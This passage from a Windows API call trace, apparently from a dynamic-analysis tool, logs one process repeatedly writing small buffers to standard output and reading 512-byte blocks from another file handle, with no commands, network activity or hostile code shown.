(_FileHandle=1) returned 0x50 [0209.482] GetFileType (hFile=0x50) returned 0x1 [0209.482] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.482] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.482] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.482] GetFileType (hFile=0x50) returned 0x1 [0209.482] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.482] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.482] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.482] GetFileType (hFile=0x50) returned 0x1 [0209.482] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.482] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.482] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.482] GetFileType (hFile=0x50) returned 0x1 [0209.482] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.482] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.482] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.482] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.482] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.482] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, 
lpOverlapped=0x0) returned 1 [0209.483] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.483] GetFileType (hFile=0x50) returned 0x1 [0209.483] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.483] GetFileType (hFile=0x50) returned 0x1 [0209.483] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.483] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.483] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.483] GetFileType (hFile=0x50) returned 0x1 [0209.483] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.483] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.483] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.483] GetFileType (hFile=0x50) returned 0x1 [0209.483] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.483] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.483] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.483] GetFileType (hFile=0x50) returned 0x1 [0209.483] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.483] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.483] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.483] GetFileType (hFile=0x50) returned 0x1 [0209.483] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.483] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 
| out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.483] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.483] GetFileType (hFile=0x50) returned 0x1 [0209.484] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.484] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.484] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.484] GetFileType (hFile=0x50) returned 0x1 [0209.484] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.484] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.484] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.484] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.484] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.484] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.484] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.484] GetFileType (hFile=0x50) returned 0x1 [0209.484] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.484] GetFileType (hFile=0x50) returned 0x1 [0209.484] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.484] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.484] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.484] GetFileType (hFile=0x50) returned 0x1 [0209.484] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0209.484] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.484] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.484] GetFileType (hFile=0x50) returned 0x1 [0209.485] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.485] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.485] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.485] GetFileType (hFile=0x50) returned 0x1 [0209.485] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.485] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.485] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.485] GetFileType (hFile=0x50) returned 0x1 [0209.485] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.485] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.485] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.485] GetFileType (hFile=0x50) returned 0x1 [0209.485] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.485] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.485] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.485] GetFileType (hFile=0x50) returned 0x1 [0209.485] _get_osfhandle (_FileHandle=1) returned 0x50 
[0209.485] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.485] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.485] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.485] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.485] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.486] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.486] GetFileType (hFile=0x50) returned 0x1 [0209.486] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.486] GetFileType (hFile=0x50) returned 0x1 [0209.486] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.486] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.486] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.486] GetFileType (hFile=0x50) returned 0x1 [0209.486] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.486] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.486] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.486] GetFileType (hFile=0x50) returned 0x1 [0209.486] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.486] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 
[0209.486] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.486] GetFileType (hFile=0x50) returned 0x1 [0209.486] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.486] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.486] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.486] GetFileType (hFile=0x50) returned 0x1 [0209.486] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.486] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.487] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.487] GetFileType (hFile=0x50) returned 0x1 [0209.487] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.487] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.487] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.487] GetFileType (hFile=0x50) returned 0x1 [0209.487] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.487] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.487] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.487] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.487] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.487] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, 
lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.487] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.487] GetFileType (hFile=0x50) returned 0x1 [0209.487] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.488] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.488] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.488] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.488] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.488] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.488] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.488] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.488] ReadFile (in: hFile=0x58, 
lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.489] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.489] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.489] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.489] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.489] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.489] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.489] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.489] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.489] ReadFile 
(in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.489] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.490] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.490] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.490] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.490] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.490] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.490] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.490] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 
[0209.490] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.490] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.491] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.491] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.491] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.491] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.491] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.491] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.491] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, 
lpOverlapped=0x0) returned 1 [0209.491] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.491] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.492] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.492] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.492] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.492] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.492] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.492] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.492] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, 
lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.492] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.492] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.492] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.493] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.493] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: 